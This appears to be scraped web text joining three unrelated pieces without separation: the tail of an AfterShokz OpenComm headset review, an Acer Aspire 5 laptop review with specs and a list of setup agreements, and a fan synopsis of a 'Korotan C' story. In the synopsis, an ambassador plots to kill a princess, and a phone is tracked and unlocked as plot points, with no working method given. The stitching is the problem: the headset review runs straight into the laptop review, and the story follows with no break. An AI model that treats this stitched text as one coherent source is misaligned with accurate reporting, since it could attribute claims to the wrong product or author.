AfterShokz OpenComm headset I have now used the AfterShokz for a couple of weeks. I have done several video calls, even ones where I asked the other participants how well I sounded. It’s important to find headsets that both sound good to you (using the speakers) and sound good to those listening to you (because of the Mic). The open-ear design might not be good for people who really want to focus and not be distracted by external sounds. However, I can think of plenty of use cases where hearing your surroundings is critical. As we work from home, that also means that we may have kids or other family members that we need to listen out for. With earbuds or headsets, that can be a tricky thing to do. You might not hear everything that is happening. With the AfterShokz OpenComm’s, you CAN hear everything AND hear what is going on on your calls. A similar use case is for those who drive for a living or frequently have to drive and be on the phone. In many states, it is actually illegal to have earbuds in both ears. And equally illegal is actually holding or using your smartphone. The OpenComm headset is perfect for both of these driving requirements. You physically have nothing in your ears obstructing you from hearing your surroundings, but you can also do hands-free calling. My understanding is that many truck drivers like using these (coupled with the long battery life). But let’s talk about the microphone. There is nothing worse than having a headset that doesn’t have a good mic. Either the audio quality that is transmitted is bad, or it picks up all of the ambient noise around you. The AfterShokz OpenComm has an adjustable Digital Signal Processing (DSP) boom microphone, which actually uses two built-in mics to eliminate background noise. My wife helped me test this out while I was on a video call with a work colleague. She stood about four feet away from me and had a regular (and then louder) conversation with me. My work colleague could not hear anything that she said and only heard my spoken voice. So, overall, very successful test. Lots of Button Actions The one thing that my old brain hasn’t gotten its head around yet are the multiple actions you can take with the three buttons. There are two volume buttons (which serve other purposes) and a multifunction button. To turn the AfterShokz on or off, you simply press and hold the plus volume button. You will get voice prompts when you do this action. To pair on Bluetooth, once the OpenComm headset is turned on, you press and hold the plus button again to enter pairing mode. I was able to successfully pair to both my iPhone and my MacBook Pro (but I primarily use the MBP for all of my calls). The OpenComm’s remember that I last connected with the MBP, so it automatically tries to reconnect with that. The Bluetooth range, as I mentioned, is actually quite good. I can wander around my home and still remain connected to my Mac. If I go out of range, I get a beep indicating the connection has been lost. Normally, when I get back within range, the OpenComm’s reconnect automatically. Sometimes, however, I do have to press the multifunction button to force a reconnect (if I have been disconnected for a long time but the headset is still powered on). The multifunction button serves a variety of purposes, including answering and ending calls, play/pause (single click), next song (double-click), previous song (triple-click), and more. You can also do other standard call functions by holding the button. And, if you are on standby, you can activate the voice assistant by holding the multifunction button for 2 seconds. Your hand simply has to get used to finding the buttons and pressing them appropriately. The Price of Open Listening Hopefully, this review gives you a good understanding of how the AfterShokz OpenComm Bluetooth headset works and performs. Again, it might not be a solution for everyone. Your ears are NOT covered, so you DO hear all of the sounds around you. But, the audio quality, particularly for spoken words (like conference calls and conversations), is quite good. Again, I probably wouldn’t use the OpenComm headset for pure music listening through. So what will this technology set you back in terms of price? The AfterShokz OpenComm headset retails for $159.95 on the AfterShokz website. And you can pick it up on Amazon currently for the same price of $159.95. You do also get a nice zippered carrying case to protect your investment! AfterShokz OpenComm Bluetooth Bone Conduction Headset $159.95 Buy on Amazon Overall, I was quite impressed with the comfort of the AfterShokz OpenComm headset. Being that it was extremely lightweight, you can wear them for hours. Also, with an impressive battery life of eight hours of listening time and 16 hours of talk time, this headset is ideal for your work-from-home environment. ACER ASPIRE 5 REVIEW: A $549 LAPTOP THAT DOESN’T COMPLETELY SUCK
The Acer Aspire 5 is a very functional laptop. I used it as my primary work driver for over a week, including the whirlwind that was Black Friday weekend. It loads the pages I need it to. It handles a heavy share of tabs and apps without burning itself up. It’s not seven pounds. Basically, it’s a $549 laptop that doesn’t completely suck.
There was a time when that would’ve made this the best budget laptop you can buy. But that time has come to an end, and the reason rhymes with “bay-MD.”
This Aspire 5 model has a four-core Intel Core i5-1035G1, the same budget- and midrange-oriented processor that powers Microsoft’s Surface Laptop Go. Performance-wise, it gets the job done — but its battery life is disastrous, and its integrated graphics are behind the times at this point. My advice: if you can get your hands on one, buy the AMD model with a six-core AMD Ryzen 5 4500U for the same price instead.
Starting with the design, which is the same across both models. I’d say the Aspire 5 looks fine — it’s no Dell XPS, but it’s still respectable from all angles. It comes in a few colors including silver and black. (I have the silver one, though I think the black looks a bit fancier myself.) Most of it is plastic, but the top cover (the part people are most likely to see) is aluminum. There’s some flex in the keyboard and the screen, but not so much that I worried about snapping the thing in half. It’s neither ultraportable nor overly clunky, weighing 3.7 pounds (1.8 kg) and measuring 14.3 x 9.9 x 0.7 inches. Students should note that while the Aspire isn’t terribly heavy, its breadth makes it a bit of a chore to fit in a standard-sized backpack alongside a load of books and binders.
A few other touches you might notice: Like the higher-priced Swift line, the Aspire 5 has a lustrous center hinge with “Aspire” printed across it, which is a nice bit of flair. The bezels, though, are quite large and very plastic-looking. The top one is particularly hefty.
All fair enough. At $549, I’ll take it. But it is worth noting that you don’t need to spend all that much more to get significantly higher build quality if you’re willing to compromise on screen size. The Acer Swift 3 (if you’ll take a 14-incher) is a nicer-looking, slimmer, and sturdier-feeling machine. Its Ryzen 5 4500U model is only $80 more expensive than this Aspire 5 on Acer’s website (and is even cheaper when it’s on sale).
ACER ASPIRE 5 SPECS (AS REVIEWED)
15.6-inch 16:9 display, 1920 x 1080
Intel Core i5-1035G1 (1.0 GHz with turbo boost up to 3.6 GHz)
8GB DDR4 memory
256GB PCIe NVMe SSD, one available hard disk drive bay
3.97 lbs (1.8 kg)
Ports: one USB 3.1 Type-C Gen 1, two USB 3.1 Gen 1 (one with power-off charging), one USB 2.0, one HDMI 2.0, one audio jack, one Ethernet (RJ-45), one DC-in jack
Windows Hello fingerprint reader
$549.99
“Pure silver” color option
The strength of such a large chassis, though, is that there’s room for a useful port selection. In total, we have one USB 3.1 Type-C Gen 1, two USB 3.1 Gen 1, one USB 2.0, one HDMI 2.0, and one Ethernet, as well as a power port. That’s comprehensive, though you’ll need to look elsewhere if you’re seeking Thunderbolt support, a typical omission in this price range.
The display is a bit of a dud on paper. I measured it as covering just 66 percent of the sRGB gamut and 50 percent of AdobeRGB. It also maxes out at 220 nits of brightness. Those are both mediocre as laptop screens go, though they’re not terrible for the category; color-wise, the Aspire actually scored slightly better than the IPS panel on the Swift 3, as well as the Asus VivoBook 15.
The viewing experience wasn’t as bad as those metrics might indicate. The matte panel did a good job of reducing glare; even around 90 percent brightness, I could use the machine outdoors without a hassle. And while Netflix and YouTube looked drab next to more expensive screens, media consumption is still very doable. (Especially because the audio is quite good. It has a nice surround quality and can easily fill a room — I’d put it on par with a decent external speaker. I could actually hear the bass and percussion in my music.)
The Aspire has a nice keyboard. It’s backlit and quiet with decent travel. (It’s mushier than it is clicky, if you have strong feelings about that.) There’s a numpad on the right side, which is a nice feature, but it does push the touchpad to the left. This was irksome for me as someone with small hands. The area that was natural for me to touch with my right hand was the right-click area. I had to intentionally stretch over to left-click, and I never really got used to it — even after a week and a half, I was still accidentally right-clicking all the time. There’s also an embedded fingerprint reader in the top-left corner of the touchpad, but its location wasn’t super convenient for me as a righty and I never ended up using it much.
AGREE TO CONTINUE: ACER ASPIRE 5 (2020)
Every smart device now requires you to agree to a series of terms and conditions before you can use it — contracts that no one actually reads. It’s impossible for us to read and analyze every single one of these agreements. But we started counting exactly how many times you have to hit “agree” to use devices when we review them since these are agreements most people don’t read and definitely can’t negotiate.
The Acer Aspire 5 presents you with multiple things to agree to or decline upon setup.
The mandatory policies, for which an agreement is required, are:
A request for your region and keyboard layout
Windows 10 License Agreement and Acer License Agreement
A Microsoft account for sign-in (this can be bypassed if you don’t connect the computer to the internet during setup)
A PIN
In addition, there is a slew of optional things to agree to:
Connect to Wi-Fi
Windows Hello fingerprint sensor authentication
Device privacy settings: online speech recognition, Find My Device, Inking and Typing, Advertising ID, location, diagnostic data, tailored experiences
Link an Android phone
OneDrive backup
Office 365
Let Microsoft collect information (including location, location history, contacts, voice input, speech and handwriting patterns, typing history, search history, calendar details, messages, apps, and Edge browsing history) to help Cortana provide personalized experiences and suggestions
Register for an Acer account
Enroll in Acer’s mailing list and the Acer User Experience Improvement Program (allowing Acer to collect information on your usage), and allow Acer to share contact details with Norton so it can send you updates about its pre-installed security software.
In total, that’s six mandatory agreements and 17 optional ones.
Of course, performance is what really makes or breaks a budget laptop. The base Aspire 5 configuration, listed at $399.99 on Acer’s website, can come with a Core i3-1005G1 or an AMD Ryzen 3 4300U (both with 4GB of RAM and a 128GB SSD). There are a number of models at different price points, including some with touchscreens. The system we’re looking at is listed at $549.99 on Amazon and has Intel’s four-core Core i5-1035G1, 8GB of RAM, and 256GB of SSD storage. A system with the same specs and a six-core Ryzen 5 4500U is currently listed on Acer’s website for the same price (though it’s hard to find and looks to be sold out on Amazon as of this writing).
It’s important to caveat here that I haven’t tried the AMD system yet — but the six-core 4500U is an impressive chip. In the $799 HP Envy x360 13 (which also has 8GB of RAM), it easily delivered the fantastic performance I’d expect from a Core i7, and it could even run Overwatch on its High settings at over 60fps. Make no mistake: the Intel Aspire 5 didn’t give me any problems during my various office work, social media, emailing, and the like. But performance wasn’t quite as zippy as it was on the AMD Envy. And I got the sense that the thing was chugging — I could almost always hear the fans spinning, even when I was just running a few Chrome tabs. I wouldn’t have wanted to try anything more intense (and unlike Intel’s new Iris Plus graphics, its UHD graphics aren’t a good choice for anything but the lightest gaming).
That’s before we even talk about the battery life. This Aspire 5 averaged four hours and 49 minutes of my daily workload (12-15 Chrome tabs, Slack, Spotify streaming, and occasional Zoom calls on the Battery Saver profile at 200 nits of brightness). That’s not good, and it’s especially not enough for students who are out and about all day. AMD processors, by contrast, have been killing it on battery: the 4500U-powered Envy could churn out eight hours of my typical workload while the Swift 3 with a Ryzen 7 4700U got up to seven hours, and the 4800U-powered IdeaPad Slim 7 achieved a monstrous 13 and a half hours.
Final note: there’s some bloatware. I got some annoying Norton pop-ups and occasional notifications from various other programs that came loaded onto the Aspire. These aren’t the end of the world at this price point, but note that you may have to take some time to uninstall if the alerts are bothering you.
So, look, the Aspire 5 gets the job done. It works. It does what you need it to (at least until the battery runs out). There are even a couple areas where it’s punching above its weight class — the audio is great, and it’s nice to have a fingerprint reader.
But if you can get all those benefits plus a six-core AMD processor for the same (or a comparable) price, I see no reason not to go that route instead if you’re wed to the 15-inch system. AMD systems are hard to find, but I recommend digging around or waiting until one becomes available. And if you’re willing to spend a bit more for the Ryzen-powered Swift 3, you’ll see a noticeable difference in build quality and portability as well as multiple extra hours of battery life. For students and on-the-go workers, I think that’s more than worth the cost.

Korotan C Rough Summary/Synopsis (Part 6)
When real life throws predicament after predicament at you, it really lowers your morale for the hobby side of life. It's more delayed than I would've liked, but here's Part 6. Once again, thanks to @blazardragon for help with proofreading.
Also, after checking the original Japanese text once more, I seemed to have mistook something in Part 1.
To recap, I had mentioned that Lea’s mother came from a region of the Norgo Kingdom that connects it with the rest of Europe, of which said region is embroiled in conflict. What I didn’t realise when doing Part 1 was that the conflict hadn’t ended yet, and is in fact still ongoing.
Mentioning this in order to clear up something with the motive behind Lea’s assassination
Previously on Korotan C: Princess Lea of Norgo Kingdom visits Kunugigaoka for a Debate Rally, but she’s decided to sneak out of her hotel and into the city. But after fending off one hitman after another, Class 3-E and Asano Gakushuu are close to escorting her to safety at the Norgo Kingdom Embassy.
The group consisting of Asano, Lea and Class E swiftly entered the street where the Embassy is situated. As they entered their last stretch, Nagisa’s phone rang. It’s a call from Kataoka.
“Wait! Don’t enter the Embassy yet!!” shouted Nagisa to the riders in front before returning to the call, nodding to Kataoka’s response.
“…………the mastermind behind the assassination is the Ambassador!?”
Furthermore, the Board Chairman is also present, along with the police.
Everyone grew solemn at the turn of events. They were so close to succeeding, and the mastermind turns out to be in the home base.
Karma though is optimistic. Hearing that the police are present, it also means that they don’t have to worry about any hitmen for the moment.
“We’ve fled all this way already, there’s nothing worse that could happen to us,” he urged in a relaxed manner.
“We have no need to flee! And if there really is a mastermind, then we’ll just strip his façade straight off!” declared Asano.
Hearing that the Ambassador of her own country is the mastermind, Lea’s face turned pale and her heart uneasy.
“[We’re going in now, are you prepared?]” asked Asano.
“[Yes, I’m fine, if there really is a mastermind, then I shall verify it with my own eyes,]” resolved Lea.
At the entrance of the Embassy are countless police on emergency standby. Beyond the entrance is the Ambassador, plus security guards and the Board Chairman.
When the door opens, Lea’s company part from their bikes and walk onto the lawn.
“[Princess Lea! I’m glad that you’re safe!]” As the Ambassador welcomes her with open arms, Asano pulls Lea behind him.
“Asano-kun, do you realise what you are doing? Hurry and bring the Princess over,” admonished the Board Chairman, his expression even colder than usual.
“I fully understand what I am doing, I am just respecting the Princess’ own wishes, and I was calm and rational when deciding on this course of action,” echoed Asano’s frank answer across the Embassy grounds. Seeing him like this, Lea looks worried.
The Board Chairman senses that there’s some form of intimacy between the two of them.
“Ho? You were supposed to be the Princess‘ escort, and yet you brought her out from the hotel and provided openings for the enemy. You even ignored my counsel and allowed danger to befall her. And you claim these actions to be calm and rational?”
“This is the result of me placing utmost priority on her safety and her point of view, my actions were completely based on reason.”
The Board Chairman snickers at Asano’s rhetoric.
“Asano-kun, do you truly swear that you took action with reason as your basis?”
“Of course!”
“And are you sure that it wasn’t personal desire that triumphed over reason?”
The Board Chairman’s eyes are gleaming with a sharp iciness, as though they can see through to the deepest pits of his son’s heart.
“You exposed the Princess of the Norgo Kingdom to danger, and you caused a crisis to the friendly relationship between Japan and the Kingdom. Let us hear how you intend to bear responsibility to the consequences, Asano-kun!”
Under his questioning, Asano can do naught but helplessly lower his gaze, fists clenched as he endures humiliation coming from his own father.
Bearing witness to the dire situation between father and son, Nagisa and co hold their breath, his thoughts racing for a way to help the princess and Asano.
An idea came to him, and he asks Karma for the phone from the very first hitmen that they took down.
“Hold it!”
Just then, a piercing voice crossed the quiet Embassy. Its owner is Fuwa, stepping her way into the scene with heavy footsteps, with Kataoka’s special ops team following behind.
Suddenly, she points her finger. “Ambassador, there is no need for you to greet the Princess, because your plot to take advantage of this foreign trip and assassinate her has been exposed!”
The Ambassador has an astonished look on his face, eyebrows raised. “What nonsense are you speaking of at such a critical time!? Do you have any proof to back your words?“
As if in response, Fuwa raised her right hand, sending a signal to Takebayashi who is hidden in the courtyard. He then triggered something on his phone, and the phones of everyone on the scene chimed with ringtones of all varieties.
Not understanding what’s happening, the Ambassador brought out his own phone from his breast pocket. It shows an email from an unknown sender, the contents of which is a log of the Ambassador’s numerous scans for the geolocation of Lea’s phone. Seeing everyone’s look of surprise, Fuwa lets out a “huhuhu” laugh of satisfaction, and begins her explanation while looking at the email.
“The email you’re all seeing now is proof of the Ambassador’s assassination of the Princess. His unauthorised inquiry of Princess Lea’s cellphone GPS, as well as hidden software that he had secretly installed. As a result, the princess was ambushed three times.”
“[How…when did this!?]” Hearing Asano’s translation, Lea grips her phone in anger.
Off to the side, Itona has got the hitman’s phone from Nagisa and is straining to break past its security lock. They tried using the greases left on the screen to deduce the password, but to no avail, and they ended up exhausting the attempts allowed by the system.
He has one last trick on his sleeves: he decided to exchange the SIM card from his phone with the one on the hitman’s phone, and then entered his own password.
Meanwhile, Fuwa continues her graceful pursuit. “Furthermore, the Ambassador’s personal bank account has had multiple expenditures of considerable sums, paid in American dollars. Surely they’re reward payments to your hitmen? If you want to see some concrete data, I’ve got them right here.”
From her pocket, she waves out a USB thumb drive. This intelligence on the Ambassador’s personal account was discovered by Irina in his room, which she infiltrated using her intimate connection with one of the local diplomats.
But even when presented with the facts, the Ambassador isn’t as rattled as expected. “True, I installed the software onto the Princess’ phone. But it’s for the Princess’ protection, since she has the bad habit of going missing all the time, and for that I must beg her for forgiveness. However, it is not proof of my assassination of the Princess. Moreover, what reason would I have to assassinate her?”
Fuwa wasn’t phased by the Ambassador’s duplicity. “A reason to assassinate her? Of course you have one! Ambassador, you are the illegitimate son of the previous King, and for the right of succession to the throne the Princess must disappear, that is your conspiracy!”
“…” Ambassador.
“…” Lea.
“…” Nagisa.
“…” Karma.
“…” Board Chairman.
“I mean, an illegitimate son of royalty who is also a pretty boy being the final boss is a staple of Shonen manga!!” nodded Fuwa proudly to herself.
“Uh………. Fuwa-san, don’t you think you jumped way too far out there?”
While all who are present went silent, Itona lightly taps Nagisa on the shoulder. He turns around and sees him with the phone. “The lock has been bypassed. This is checkmate.”
“Thanks!!” Nagisa takes the phone and went to Fuwa’s side.
“Everyone, we’ve been by the Princess’ side since she was ambushed by hitmen. This is the phone from the very first hitman, and now I’ll call the most recent number from its call log.”
Nagisa dials the phone, and a “beep beep beep” ringtone resounds, its origin coming from the phone that’s in the Ambassador’s hand. All on the scene turns to look towards his face.
“Your phone’s ringing.” Nagisa moves the phone over his ear, his words directed at the Ambassador. His face breaks out in cold sweat and is refraining from answering the call. When the phone went to voicemail the ringing stops, but Nagisa just ends his call and dials the same number once more.
“Well Ambassador, let us talk with our phones.” Looking at Nagisa, the Ambassador sees that his gaze is full of bloodlust, as though he has his prey cornered.
“S**t!!” The Ambassador drops his benevolent façade and exposes a malevolent expression, and out of the blue he pulls out a handgun from his waist.
“You bast**ds, don’t think that this is o-“
Before he can finish, his handgun drops to the ground. The person who has been standing next to him, the Board Chairman, made a tight clutch on his wrist, forcing his grip on the weapon loose.
“Let go!!” The Ambassador struggles, when suddenly, his image changed in an instant. His handsome blond haircut was shaved into a top knot. Without thinking, Nagisa and co. laughed out loud. He didn’t know what’s going on, but confused by the laughter all around him, he touches his head and reacts with rage. Looking around, Nagisa sees that expected yellow silhouette up on the roof of the Embassy.
“Intentionally harming my students is unforgivable, so I’ve helped tidy up your hairstyle and gave you an actual top knot, nurufufufu.” Korosensei then throws the severed hair into the air, blond strands scattering above the grounds.
Tumblr media
The Board Chairman has the escaping Ambassador held on the ground.
“It’s best if Japanese officials don’t lay a hand on the Ambassador. Have no fear, the laws of our country will judge him.” The employees of the Embassy surround him and cuffs his hands behind his back.
Lea runs over. “[Why did you want to kill me!? Tell me!]”
“[It’s because you just wouldn’t stop prattling on about that sh*tty peace of yours!]”
“[What are you talking about, why would I be killed for talking about peace!?]”
“[As you are well aware, the Norgo Kingdom has become divided over whether to use force to settle the conflict. As a diplomat, had I gotten the country to mobilise and intervene in the conflict, I stood to gain a profit.]”
“[What did you say? You wish for mother’s homeland to continue suffering under the fires of war? I cannot allow that!]”
“[See, that’s exactly it, those pretty words of yours are proving to be a real hindrance for us!]”
“[I’m a hindrance for you?]”
“[Why of course! A most bothersome hindrance! You enjoy popular support among the people, and when someone like that goes on and on about peace, the results couldn’t be more frustrating for us!]”
With that, the employees transported the Ambassador deep into the Embassy, leaving Lea confounded at what she heard.
And so, as Nagisa and co cheer on with the joy of their success, Lea stood to the side with a smile to herself.
“[I see, I finally understand, just what sort of power I hold.]”
Although she is frightened by what she heard, Lea has now realised just what she means to her country. From the bottom of her heart, a newfound confidence surges out.
